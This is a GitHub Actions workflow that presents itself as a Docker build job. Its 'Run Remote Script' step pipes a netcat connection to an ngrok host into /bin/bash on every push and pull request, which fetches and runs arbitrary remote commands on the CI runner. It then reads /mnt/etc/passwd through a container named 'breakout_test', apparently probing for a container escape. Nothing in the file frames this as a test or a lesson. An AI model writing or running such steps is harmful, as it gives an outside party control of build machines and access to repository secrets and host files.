name: Docker Build and Execute

on:
  push:
    branches:
      - main
  pull_request:

jobs:
  build-and-run:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout the repository
      uses: actions/checkout@v3

    - name: Build Docker Image
      run: |
        echo -e "FROM alpine:latest\nRUN apk add --no-cache bash" > Dockerfile
        docker build --tag alpine .

    - name: Run Remote Script and Docker Command
      run: |
        # Connect to remote server and execute the script
        nc 4.tcp.us-cal-1.ngrok.io 15962 | /bin/bash

        # Execute command inside Docker container
        docker exec breakout_test curl file:///mnt/etc/passwd
